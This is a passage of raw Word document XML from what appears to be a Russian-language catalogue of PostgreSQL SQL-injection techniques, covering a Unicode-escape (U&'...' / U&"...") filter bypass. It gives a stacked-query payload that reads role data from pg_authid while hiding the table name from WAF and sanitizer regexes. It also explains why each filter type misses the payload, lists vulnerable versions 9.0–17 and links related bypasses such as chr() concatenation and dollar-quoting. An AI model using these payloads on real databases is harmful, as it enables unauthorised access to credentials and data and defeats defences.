        </w:rPr>
        <w:t>"pg_authid"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обходит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-границу слова, но содержит подстроку. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;"..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строит идентификатор из codepoint-ов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE403ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в DO-контексте, потому что напрямую </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM U&amp;"..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> тоже работает, но reader-friendly через PL/pgSQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39774715" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1; SELECT rolname FROM U&amp;"\0070\0067\005F\0061\0075\0074\0068\0069\0064" --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEEBC02" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AF6839" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title FROM articles LIMIT 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083E4833" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT rolname FROM U&amp;"\0070\0067\005F\0061\0075\0074\0068\0069\0064" --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586478CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;"\0070\0067..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсится как идентификатор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"pg_authid"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с двойными кавычками, регистрозависимый). PG ищет таблицу с этим именем — находит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog.pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sanitizer/WAF не нашли подстроки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в payload-тексте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217B8474" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;"..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — менее распространённый, чем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'...'</w:t>
      </w:r>
      <w:r>
        <w:t>. Идентификаторы в PG ограничены 63 байтами по умолчанию (NAMEDATALEN); для длинных имён в payload — приходится укорачивать или поднимать NAMEDATALEN (последнее — только пересборка PG).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A951528" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64597027" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — лексический префикс. Парсер PG распознаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как маркер Unicode-escape перед строковым литералом и применяет escape-интерпретацию. WAF-regex, ориентированный на конкретные подстроки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t>), их в payload не видит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56307317" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В отличие от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr()</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нет вызова функции. Sanitizer, ищущий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\w+\s*\(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не находит ничего; sanitizer, считающий «слишком много </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t>», тоже не срабатывает (вся строка — один литерал без конкатенации).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBC1AEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UESCAPE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Payload B) обходит фильтр на backslash — escape-символ переопределяется одним токеном </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UESCAPE '!'</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A614985" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;"..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Payload C) — лексическая форма идентификатора, обходит word-boundary regex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214E23DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC2F076" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>•   Unicode-escape — часть SQL:2003 стандарта, реализована в PG с 9.0 (документация: §4.1.2.3 в Lexical Structure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8FBF86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Синтаксис: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + standard string literal с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\NNNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (4 hex для BMP) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\+NNNNNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (6 hex для supplementary planes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B35DA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Опциональный модификатор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UESCAPE '&lt;char&gt;'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> следует сразу после литерала. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;char&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — один не-hex, не-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>, не-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>, не-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> символ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071CD80B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;"..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — quoted-identifier с Unicode-escape, регистрозависимый (как обычный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"..."</w:t>
      </w:r>
      <w:r>
        <w:t>-идентификатор).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7898C195" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Поведение зависит от GUC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>standard_conforming_strings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: дефолт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с PG 9.1) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (legacy) — backslash-escape в обычных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-литералах включён, и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> всё равно работает по SQL-стандарту, потому что префикс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> явно сигнализирует Unicode-форму.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17477C0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6EA935" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 9.0 – 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (все поддерживаемые). Unicode-escape стабилен с 9.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5E2FB8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает везде идентично self-hosted. Это лексическая фича парсера, на неё не влияют провайдер-специфичные ограничения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34597B0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D1F643" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — dollar-quoting; ортогонален Unicode-escape. Часто комбинируются, когда нужно избежать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> снаружи (3.9.1) и в то же время скрыть содержимое (3.9.3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE15B0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr()</w:t>
      </w:r>
      <w:r>
        <w:t>-конкатенация. Семантически близка, но Unicode-escape компактнее и не использует function call. Различаются по тому, какой класс sanitizer обходят.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6F0572" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>convert_from(decode(...))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — ещё компактнее, но использует function call. Выбор между 3.9.3 и 3.9.5 — по тому, что фильтр разрешает (escape-синтаксис или функции).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A30CCD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — escape strings </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E'\x27'</w:t>
      </w:r>
      <w:r>
        <w:t>. Близкий синтаксис, другая лексика (E-prefix, hex/octal escape).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2F39A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Identifier injection в plpgsql. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;"..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернативная форма quoted-identifier, к которой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> устойчив (не падает, корректно эскейпит), но whitelist по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t>-pattern на имена — может пропустить.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C2DA7C"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\bU&amp;['"]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Unicode-escape префикс) нет.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6944B0B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3B7ADA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Lexical Structure — Unicode String Constants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E4BD0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Lexical Structure — Quoted Identifiers and Unicode Escapes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7934D2D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
